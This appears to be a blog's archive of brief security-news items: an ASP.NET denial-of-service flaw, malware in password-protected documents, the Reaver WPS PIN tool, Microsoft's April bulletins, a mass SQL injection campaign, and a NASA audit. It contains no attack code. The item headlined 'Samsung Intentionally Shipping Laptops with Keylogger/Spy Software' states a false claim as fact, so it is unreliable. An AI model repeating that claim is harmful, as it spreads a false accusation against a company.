A vulnerability in ASP.NET that could allow an attacker to consume all of the resources on a vulnerable server with a single specially designed HTTP request. The vulnerability affects a wide range of Web platforms are vulnerable to this attack, and Microsoft officials said they’re releasing the patch now because they’re expecting exploit code to be released in the near future.
Category Archives: Vulnerabilities
Beware of password-protected documents carrying malware
Passwords for document files are commonly used to prevent unauthorized access to the files by encrypting them with passwords. However, attackers are misusing the password feature to encrypt files, most likely to make it difficult for security products to detect them as malware,” say the researchers. “It also makes reverse-engineering the files difficult because they need to be decrypted before analysis can be performed.
Check out Help Net Security for the full article
Attack Tool Released for WPS PIN Vulnerability
Just a day after security researcher Stefan Viehbock released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, has the ability to find the WPS PIN on a given router and then recover the WPA passphrase for the router, as well.
The vulnerability reported by Viehbock to US-CERT is related to the way that the WPS standard handles failed authentication attempts in some cases. In those scenarios, it will send back too much detailed information to the user–or attacker–about the PIN that’s required to set up the router using WPS. Viehbock found that he was able to use that information to greatly reduce the amount of time it takes to recover the PIN for a router through a brute-force attack. Once the attacker has the WPS PIN, he can take control of the router.
The full article by Threat Post
Microsoft Security Patches for April
Patch Tuesday a staggering 17 security bulletins (nine of which have been given Microsoft’s highest severity rating of “critical”), addressing 64 security vulnerabilities. Software including bugs which are said to be fixed by the patches include Microsoft Windows, Microsoft Office, Internet Explorer, Visual Studio and .NET Framework.
One of the vulnerabilities reportedly fixed will be the MHTML redering flaw that was discovered earlier this year. Internet Explorer was one the products found to be at risk from the zero-day vulnerability that could allow maliciously crafted webpages to execute code in any “zone” regardless of which zone is specified.
Bulletin Summary Bulletin ID Maximum Severity Rating Vulnerability Impact Restart Requirement Affected Software* Bulletin 1 Critical Remote Code Execution Requires restart Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 2 Critical Remote Code Execution Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 3 Critical Remote Code Execution Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 4 Critical Remote Code Execution May require restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 5 Critical Remote Code Execution May require restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 6 Critical Remote Code Execution May require restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Office XP. Bulletin 7 Critical Remote Code Execution Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 8 Critical Remote Code Execution May require restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 9 Critical Remote Code Execution Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 10 Important Remote Code Execution May require restart Microsoft Excel 2002, Excel 2003, Excel 2007, Excel 2010, Office 2004 for Mac, Office 2008 for Mac, Office for Mac 2011, Open XML File Format Converter for Mac, Excel Viewer, and Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats. Bulletin 11 Important Remote Code Execution May require restart Microsoft PowerPoint 2002, PowerPoint 2003, PowerPoint 2007; PowerPoint 2010, Office 2004 for Mac, Office 2008 for Mac, Office for Mac 2011, Open XML File Format Converter for Mac, PowerPoint Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, and PowerPoint Web App. Bulletin 12 Important Remote Code Execution May require restart Microsoft Office XP, Office 2003, Office 2007, Office 2004 for Mac, Office 2008 for Mac, and Open XML File Format Converter for Mac. Bulletin 13 Important Remote Code Execution May require restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 14 Important Remote Code Execution May require restart Microsoft Visual Studio .NET 2003, Visual Studio 2005, Visual Studio 2008, Visual Studio 2010, Visual C++ 2005 SP1 Redistributable Package, Visual C++ 2008 Sp1 Redistributable Package, and Visual C++ 2010 Redistributable Package. Bulletin 15 Important Information Disclosure Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. Bulletin 16 Important Remote Code Execution May require restart Microsoft Windows XP and Windows Server 2003. Bulletin 17 Important Elevation of Privilege Requires restart Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. * The list of affected software in the summary table is an abstract. To see the full list of affected components please click on the “Advance Notification Webpage” link below and review the “Affected Software” section. Further information on the patches can be found in the advance notice that Microsoft has published on its website.
SQL Injection Attack Compromises 380,000 URLs
A massive SQL injection attack campaign has been spotted by Websense researchers, and the number of unique URLs affected by it has risen from 28,000 when first detected yesterday, to 380,000 when the researchers last checked.
The injected script redirects users that have landed on various infected pages to the domain in the script, which then redirects them further to a website simulating an anti-malware check and peddling a rogue AV solution.
Both sites are currently offline, say the researchers, but the attackers have started using other domains for redirection, and will likely keep changing them up.
The researchers also noted that some iTunes URLs have been injected with the script, but that Apple has done a good job in securing the site against this kind of attacks.
“The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn’t execute on the user’s computer,” they explained.
Samsung Intentionally Shipping Laptops with Keylogger/Spy Software
Network World published a story today by Mohamed Hassan explaining how he had purchased a new Samsung laptop recently and discovered that it had a keylogger (StarLogger) pre-installed from the factory. Not only could this software log all of your keystrokes it is also capable of taking screenshots.
Check out the article - NeworkWorld
NASA systems dangerously at risk from cyberattack
An official audit of NASA’s network has concluded that the space agency faces a high risk of cyberattack.
Experts from the Office of the Inspector General (OIG) paint a grim picture of the state of the space agency’s server infrastructure, warning that vulnerabilities in its systems leave it open to defacement, denial of service or information-stealing attacks.
In particular, six unnamed IT systems were found to be at risk to attacks that might allow hackers to seize remote control of critical systems over the net – which included systems that control spacecraft – as a result of unpatched software vulnerabilities.
Read the full article – The Register